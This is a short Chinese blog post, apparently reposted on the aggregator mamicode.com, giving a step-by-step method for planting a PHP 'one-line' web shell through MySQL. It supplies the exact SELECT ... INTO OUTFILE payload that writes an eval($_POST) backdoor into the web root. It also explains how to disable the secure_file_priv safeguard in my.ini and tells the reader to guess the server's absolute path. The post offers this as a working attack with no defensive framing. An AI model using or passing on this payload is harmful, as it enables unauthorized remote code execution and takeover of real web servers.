码迷,mamicode.com
首页 > 数据库 > 详细

通过mysql写入php一句话木马

时间:2019-02-25 18:58:54      阅读:418      评论:0      收藏:0      [点我收藏+]

标签:设置   pos   php   解决办法   允许   ror   class   The   导入导出   

 利用mysql写入一句话木马

前提:

  root权限,知道了服务器的web的绝对路径

select "<?php @eval($_POST[‘pass‘]);?>" INTO OUTFILE "D:\\WWW\\22.php"

如果执行成功,生成D:\WWW\22.php,并写入

<?php @eval($_POST[‘pass‘]);?>

如果出现:

  提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制,默认不允许

show variables like ‘%secure%‘;

技术图片

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意: 

  1、绝对路径的猜解

  2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(对反斜杠做了一次转义)

 

通过mysql写入php一句话木马

标签:设置   pos   php   解决办法   允许   ror   class   The   导入导出   

原文地址:https://www.cnblogs.com/baby123/p/10432205.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!